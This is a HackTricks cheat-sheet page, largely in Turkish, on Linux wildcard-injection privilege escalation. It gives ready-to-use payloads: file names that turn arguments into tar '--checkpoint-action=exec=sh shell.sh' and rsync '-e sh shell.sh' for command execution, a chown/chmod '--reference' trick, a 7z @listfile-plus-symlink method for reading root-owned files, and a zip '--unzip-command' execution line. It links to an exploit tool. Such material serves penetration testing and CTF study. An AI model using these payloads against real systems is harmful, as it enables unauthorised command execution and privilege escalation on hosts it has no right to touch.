4.9 KiB
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
chown, chmod
Hangi dosya sahibini ve izinlerini diğer dosyalar için kopyalamak istediğinizi belirtebilirsiniz.
touch "--reference=/my/own/path/filename"
You can exploit this using https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (combined attack)
Daha fazla bilgi için https://www.exploit-db.com/papers/33930
Tar
Rasgele komutlar çalıştırın:
touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"
Bu, https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar saldırısı) kullanılarak istismar edilebilir.
Daha fazla bilgi için https://www.exploit-db.com/papers/33930 adresine bakın.
Rsync
Rasgele komutlar çalıştırın:
Interesting rsync option from manual:
-e, --rsh=COMMAND specify the remote shell to use
--rsync-path=PROGRAM specify the rsync to run on remote machine
touch "-e sh shell.sh"
Bu, https://github.com/localh0t/wildpwn/blob/master/wildpwn.py _(_rsync attack) kullanılarak istismar edilebilir.
Daha fazla bilgi için https://www.exploit-db.com/papers/33930 adresine bakın.
7z
7z içinde --
kullanarak *
'dan önce (not: --
sonraki girdinin parametre olarak işlenemeyeceği anlamına gelir, bu durumda sadece dosya yolları) rastgele bir hatanın bir dosyayı okumasına neden olabilirsiniz, bu nedenle aşağıdaki gibi bir komut root tarafından çalıştırılıyorsa:
7za a /backup/$filename.zip -t7z -snl -p$pass -- *
Ve bu işlemin gerçekleştirildiği klasörde dosyalar oluşturabilirsiniz, @root.txt
dosyasını ve okumak istediğiniz dosyaya symlink olan root.txt
dosyasını oluşturabilirsiniz:
cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt
Sonra, 7z çalıştırıldığında, root.txt
dosyasını sıkıştırması gereken dosyaların listesini içeren bir dosya olarak ele alacaktır (bu, @root.txt
varlığının gösterdiği şeydir) ve 7z root.txt
dosyasını okuduğunda /file/you/want/to/read
dosyasını okuyacak ve bu dosyanın içeriği bir dosya listesi olmadığından, bir hata verecektir içeriği göstererek.
HackTheBox'tan CTF kutusunun Yazılımlarında daha fazla bilgi.
Zip
Rasgele komutlar çalıştır:
zip name.zip files -T --unzip-command "sh -c whoami"
{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'ı takip edin.**
- Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.